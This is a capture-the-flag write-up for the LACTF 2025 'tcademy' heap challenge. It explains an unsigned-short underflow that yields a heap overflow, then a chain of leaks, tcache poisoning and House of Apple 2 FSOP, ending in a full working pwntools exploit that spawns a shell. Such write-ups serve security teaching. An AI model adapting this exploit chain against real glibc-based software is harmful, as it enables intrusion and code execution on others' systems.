tcademy - LACTF 2025 PWN Writeup
Category: PWN
Difficulty: Medium-Hard
Points: 269
Solves: 40
Flag: lactf{omg_arb_overflow_is_so_powerful}
Solved by: Smothy @ 0xN1umb

"Who needs a double-free when you have unsigned short math?"
Challenge Description
I'm telling you, tcache poisoning doesn't just happen due to double-frees!
nc chall.lac.tf 31144
A heap note manager with 2 slots. The challenge author was very proud of preventing off-by-ones. Spoiler: they introduced something way worse.
TL;DR
Unsigned short underflow in size calculation gives us a massive heap overflow from a tiny chunk. We chain heap leak + libc leak + tcache poison + House of Apple 2 FSOP to pop a shell. Heap math go brrr.
Initial Recon
We get a 64-bit binary with ALL protections enabled:
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Full RELRO means no GOT overwrite. No __malloc_hook/__free_hook (glibc 2.35). SHSTK + IBT means CET is enabled. We need FSOP for code execution.
The binary is a simple note manager with 2 slots: create, delete, read, exit. Delete properly NULLs the pointer (no UAF/double-free). Reading uses puts().
Step 1: Finding The Bug
The "off-by-one prevention" code:
unsigned short resized_size = size == 8 ? (unsigned short)(size - 7) : (unsigned short)(size - 8);
int bytes = read(0, note, resized_size);
The key insight: the size check rejects size < 0 || size > 0xf8, but size = 0 sails right through. Then:
resized_size = (unsigned short)(0 - 8) = 0xFFF8
Unsigned short underflow! malloc(0) still returns a minimum-size 0x20 chunk, but read() will now accept up to 65528 bytes starting from it. That's a massive heap overflow.
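The wrap-around is easy to reproduce outside the binary. A minimal Python sketch mirroring the challenge's C arithmetic (the `resized` helper is ours, not from the challenge source):

```python
import ctypes

def resized(size: int) -> int:
    # Mirror of the challenge's expression: the subtraction happens in C's
    # `unsigned short`, so any negative result wraps modulo 2**16.
    delta = 7 if size == 8 else 8
    return ctypes.c_uint16(size - delta).value

assert resized(0x28) == 0x20   # sane sizes behave as the author intended
assert resized(8) == 1         # the "off-by-one prevention" special case
assert resized(0) == 0xFFF8    # size=0 wraps: a 65528-byte read into a 0x20 chunk
```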
Step 2: Heap Layout & Overflow Strategy
The heap layout after initial allocations:
page+0x290: [overflow chunk hdr] (size 0x21)
page+0x2a0: [overflow chunk data] ← we write from here
page+0x2b0: [target chunk hdr] (size 0x31) ← we overflow into here
page+0x2c0: [target chunk data] ← and here (tcache fd pointer)
page+0x2e0: [top chunk]
From a 0x10-byte user data area, we can overflow arbitrarily far. The strategy:
- Phase 1: Overflow to leak heap address (safe-linked tcache fd)
- Phase 2: Corrupt chunk size to get unsorted bin → leak libc
- Phase 3: Tcache poison → overwrite
_IO_list_all→ FSOP → shell
Step 3: Phase 1 - Heap Leak
# Alloc two chunks, free both to tcache
create(p, 0, 8, b'A') # 0x20 chunk at page+0x2a0
create(p, 1, 0x28, b'B'*0x20) # 0x30 chunk at page+0x2c0
delete(p, 1) # tcache[0x30]: page+0x2c0
delete(p, 0) # tcache[0x20]: page+0x2a0
# Overflow: fill through to the safe-linked fd
padding = b'\x41' * 0x10 + b'\x42' * 8 + b'\x43' * 8
create(p, 0, 0, padding) # size=0 → 0xFFF8 byte overflow!
# puts() reads through non-null bytes to the fd pointer
leak_data = read_note(p, 0)
heap_shifted = u64(leak_data[0x20:].rstrip(b'\n').ljust(8, b'\x00'))
page_base = heap_shifted << 12 # safe-linking: fd = addr >> 12
glibc 2.35 safe-linking stores fd = (chunk_addr >> 12) ^ next_ptr. For a single tcache entry, next_ptr = NULL, so fd = chunk_addr >> 12. We shift back to recover the heap page base.
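The same PROTECT_PTR math does double duty later for the poison. A quick sketch (the addresses below are hypothetical, for illustration only):

```python
def protect_ptr(pos: int, ptr: int) -> int:
    # glibc 2.32+ PROTECT_PTR: the fd stored at address `pos`, pointing to `ptr`.
    return (pos >> 12) ^ ptr

# Hypothetical addresses.
page_base = 0x55e4d2b00000
chunk = page_base + 0x2c0
io_list_all = 0x7f3c1a21b680

# Last entry in the bin: next_ptr is NULL, so the stored fd is just addr >> 12.
stored_fd = protect_ptr(chunk, 0)
assert stored_fd == chunk >> 12
assert (stored_fd << 12) == page_base  # chunk's low 12 bits vanish in the shift

# Poisoning: encode the target exactly the way glibc would.
poison_fd = protect_ptr(chunk, io_list_all)
assert poison_fd ^ (chunk >> 12) == io_list_all  # glibc decodes back to our target
```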
Step 4: Phase 2 - Libc Leak via Unsorted Bin
Tcache only handles chunks up to 0x410 bytes. If we can make glibc think a chunk is 0x420+ bytes, free goes to the unsorted bin, which stores libc pointers (main_arena).
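Why exactly 0x420? glibc's free path computes a tcache bin index from the chunk size and only uses tcache if that index is below TCACHE_MAX_BINS (64 by default). A sketch of the csize2tidx macro from malloc.c, with x86-64 constants:

```python
MINSIZE = 0x20           # smallest chunk on x86-64
MALLOC_ALIGNMENT = 0x10
TCACHE_MAX_BINS = 64

def csize2tidx(chunk_size: int) -> int:
    # glibc's csize2tidx macro (malloc/malloc.c)
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT

assert csize2tidx(0x20) == 0                   # first tcache bin
assert csize2tidx(0x410) == 63                 # last tcache bin
assert csize2tidx(0x420) >= TCACHE_MAX_BINS    # too big → unsorted bin on free
```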
# Corrupt chunk size from 0x31 to 0x421
data = b'\x41' * 0x10 + p64(0) + p64(0x421)
# Must write fake top chunk + guard chunks for validation
fill = b'\x00' * 0x20 + p64(0) + p64(0x20d21) + b'\x00' * (0x410 - 0x30)
data += fill
data += p64(0x420) + p64(0x21) + p64(0)*2 # guard chunk 1
data += p64(0x20) + p64(0x21) # guard chunk 2
create(p, 0, 0, data)
delete(p, 1) # chunk thinks it's 0x421 → unsorted bin!
Then overflow again to read the unsorted bin fd pointer:
unsorted_bin_addr = u64(libc_raw.ljust(8, b'\x00'))
libc_base = unsorted_bin_addr - 0x21ace0 # empirically determined offset
The offset 0x21ace0 was determined by comparing the leaked pointer against /proc/pid/maps during local testing.
Step 5: Phase 3 - Tcache Poison + House of Apple 2
Now we have both heap and libc leaks. Time for the kill.
Tcache poisoning: Allocate two 0x30 chunks from the unsorted bin remainder, free them to tcache, then overflow to corrupt the fd pointer:
poison_fd = safe_key ^ io_list_all # safe-linking encode
This makes the tcache chain: page+0x2c0 → _IO_list_all. Two allocations later, we write our fake FILE struct address to _IO_list_all.
House of Apple 2 (FSOP): When exit() calls _IO_flush_all_lockp, it iterates through _IO_list_all. Our fake FILE struct triggers:
exit()
→ _IO_flush_all_lockp()
→ _IO_OVERFLOW(fake_file, EOF) [vtable = _IO_wfile_jumps]
→ _IO_wfile_overflow()
→ _IO_wdoallocbuf()
→ _IO_WDOALLOCATE() [wide_vtable→__doallocate = system]
→ system(fake_file) [_flags = " sh\0"]
→ shell!
The fake FILE struct layout:
- _flags = 0x00687320 → bytes in memory: " sh\0" (the argument to system)
- _mode = 1 → triggers the wide-oriented path
- vtable = _IO_wfile_jumps → passes vtable validation (it's legit!)
- _wide_data → _wide_vtable → __doallocate = system → the unvalidated call
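The _flags trick works because the FILE struct's own address is what eventually lands in rdi, and _flags sits at offset 0. A sanity check of the byte layout (the leading space keeps the low flag bits benign, and the shell ignores leading whitespace in the command string):

```python
import struct

FLAGS = 0x00687320
# Little-endian: 0x20 0x73 0x68 0x00 in memory, i.e. a NUL-terminated " sh".
flags_bytes = struct.pack('<I', FLAGS)
assert flags_bytes == b' sh\x00'
```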
The Flag
$ id
uid=1000 gid=1000 groups=1000
$ cat /app/flag.txt
lactf{omg_arb_overflow_is_so_powerful}
Indeed, arbitrary overflow IS so powerful.
The Solve Script
#!/usr/bin/env python3
"""
tcademy - LACTF 2025 PWN
Unsigned short underflow → heap overflow → tcache poison → House of Apple 2
Solved by: Smothy @ 0xN1umb
"""
from pwn import *
context.binary = elf = ELF('./chall')
libc = ELF('./libc.so.6')
SYSTEM = libc.sym.system
IO_LIST_ALL = libc.sym._IO_list_all
IO_WFILE_JUMPS = libc.sym._IO_wfile_jumps
UNSORTED_BIN_OFFSET = 0x21ace0
def conn():
if args.REMOTE:
return remote('chall.lac.tf', 31144)
return process('./chall')
def create(p, idx, size, data):
p.sendlineafter(b'Choice > ', b'1')
p.sendlineafter(b'Index: ', str(idx).encode())
p.sendlineafter(b'Size: ', str(size).encode())
p.sendafter(b'Data: ', data)
def delete(p, idx):
p.sendlineafter(b'Choice > ', b'2')
p.sendlineafter(b'Index: ', str(idx).encode())
def read_note(p, idx):
p.sendlineafter(b'Choice > ', b'3')
p.sendlineafter(b'Index: ', str(idx).encode())
return p.recvline()
p = conn()
# === Phase 1: Heap Leak ===
create(p, 0, 8, b'A')
create(p, 1, 0x28, b'B' * 0x20)
delete(p, 1)
delete(p, 0)
padding = b'\x41' * 0x10 + b'\x42' * 8 + b'\x43' * 8
create(p, 0, 0, padding)
leak_data = read_note(p, 0)
heap_shifted = u64(leak_data[0x20:].rstrip(b'\n').ljust(8, b'\x00'))
page_base = heap_shifted << 12
safe_key = page_base >> 12
log.success(f"Heap page base: {hex(page_base)}")
# Restore tcache metadata
delete(p, 0)
restore = b'\x41' * 0x10 + p64(0) + p64(0x31) + p64(safe_key)
create(p, 0, 0, restore)
# === Phase 2: Libc Leak ===
create(p, 1, 0x28, b'C\n')
delete(p, 0)
data = b'\x41' * 0x10 + p64(0) + p64(0x421)
fill = b'\x00' * 0x20 + p64(0) + p64(0x20d21) + b'\x00' * (0x410 - 0x30)
data += fill
data += p64(0x420) + p64(0x21) + p64(0)*2
data += p64(0x20) + p64(0x21)
create(p, 0, 0, data)
delete(p, 1)
delete(p, 0)
leak_pad = b'\x41' * 0x10 + b'\x42' * 8 + b'\x43' * 8
create(p, 0, 0, leak_pad)
libc_raw = read_note(p, 0)[0x20:].rstrip(b'\n')
libc_base = u64(libc_raw.ljust(8, b'\x00')) - UNSORTED_BIN_OFFSET
system_addr = libc_base + SYSTEM
io_list_all = libc_base + IO_LIST_ALL
io_wfile_jumps = libc_base + IO_WFILE_JUMPS
log.success(f"Libc base: {hex(libc_base)}")
# Restore chunk size
delete(p, 0)
create(p, 0, 0, b'\x41' * 0x10 + p64(0) + p64(0x421))
# === Phase 3: Tcache Poison + FSOP ===
delete(p, 0)
create(p, 0, 0x28, b'D\n')
create(p, 1, 0x28, b'E\n')
delete(p, 1)
delete(p, 0)
poison_fd = safe_key ^ io_list_all
fake_file_addr = page_base + 0x2d0
fake_wide_data_addr = fake_file_addr + 0xe0
fake_wide_vtable_addr = fake_wide_data_addr + 0xe8
lock_addr = fake_file_addr + 0x10
# Fake FILE struct (House of Apple 2)
fake_file = p32(0x00687320) + p32(0) # _flags = " sh\0"
fake_file += p64(0)*3 # read_ptr, read_end, read_base
fake_file += p64(0) + p64(1) + p64(0) # write_base=0, write_ptr=1, write_end
fake_file += p64(0)*5 # buf_base..save_end
fake_file += p64(0)*2 # markers, chain
fake_file += p32(0)*2 + p64(0)*2 # fileno, flags2, old_offset, cur_column
fake_file += p64(lock_addr) + p64(0)*2 # lock, offset, codecvt
fake_file += p64(fake_wide_data_addr) # _wide_data
fake_file += p64(0)*3 # freeres_list/buf, __pad5
fake_file += p32(1) + b'\x00' * 20 # _mode=1, _unused2
fake_file += p64(io_wfile_jumps) # vtable
# Fake _IO_wide_data
fake_wide = p64(0)*3 # read ptrs
fake_wide += p64(0) + p64(1) + p64(0) # write_base=0, write_ptr=1
fake_wide += p64(0)*2 # buf_base=0, buf_end
fake_wide += b'\x00' * (0xe0 - 0x40) # padding
fake_wide += p64(fake_wide_vtable_addr) # _wide_vtable
# Fake wide vtable
fake_vtable = b'\x00' * 0x68 + p64(system_addr) # __doallocate = system
# Overflow payload
payload = b'\x41' * 0x10 + p64(0) + p64(0x31) # padding + chunk header
payload += p64(poison_fd) + p64(0) # poisoned fd + key
payload += fake_file + fake_wide + fake_vtable # FSOP structures
create(p, 0, 0, payload)
create(p, 1, 0x28, b'F\n') # consume legitimate entry
delete(p, 0)
create(p, 0, 0x28, p64(fake_file_addr)) # write to _IO_list_all
# Trigger: exit → FSOP → system(" sh")
p.sendlineafter(b'Choice > ', b'4')
p.interactive()
The Graveyard of Failed Attempts
- Wrong unsorted bin offset: Initially tried brute-forcing the main_arena offset. Spent hours getting "goodbye!" with no shell. Had to empirically determine the exact offset (0x21ace0) by reading /proc/pid/maps during local testing.
- heap_base vs page_base confusion: Used heap_base = (leaked << 12) - 0x2c0 as the reference point, making fake_file_addr off by 0x2c0 bytes. The fake FILE was placed in the wrong location. Fixed by using page_base = leaked << 12 directly.
- "double free or corruption (out)": Overflowing to corrupt the chunk size also destroyed the top chunk header at page+0x2e0. Had to write a fake top chunk with a valid size and PREV_INUSE bit during the overflow.
- Thought read() was getchar(): Spent time debugging a phantom "I/O deadlock" that didn't exist. The source code uses read(0, note, resized_size), which returns immediately with whatever bytes are available. Classic RTFM moment.
- GDB with pwndbg broken: pwndbg's virtualenv was corrupted, so we had to resort to LD_PRELOAD malloc/free tracing hooks for heap debugging.
Key Takeaways
- Unsigned integer underflow is dangerous: even "safe" arithmetic like size - 8 becomes a massive overflow when the type is unsigned and size < 8
- House of Apple 2 bypasses vtable validation: the main FILE vtable is validated, but _wide_data->_wide_vtable is NOT
- glibc 2.35 safe-linking requires a heap leak to poison tcache: stored_fd = (chunk_addr >> 12) ^ target
- Always empirically verify offsets: don't guess the main_arena offset, measure it with /proc/pid/maps
- Unsorted bin abuse requires careful setup: fake top chunk headers and guard chunks to pass glibc's consolidation checks
Tools Used
- pwntools (exploit framework)
- objdump (disassembly verification)
- Custom LD_PRELOAD hooks (malloc/free tracing)
- Way too much caffeine
Writeup by Smothy from 0xN1umb team. Three phases, one overflow, zero double-frees. The tcache never saw it coming. GG.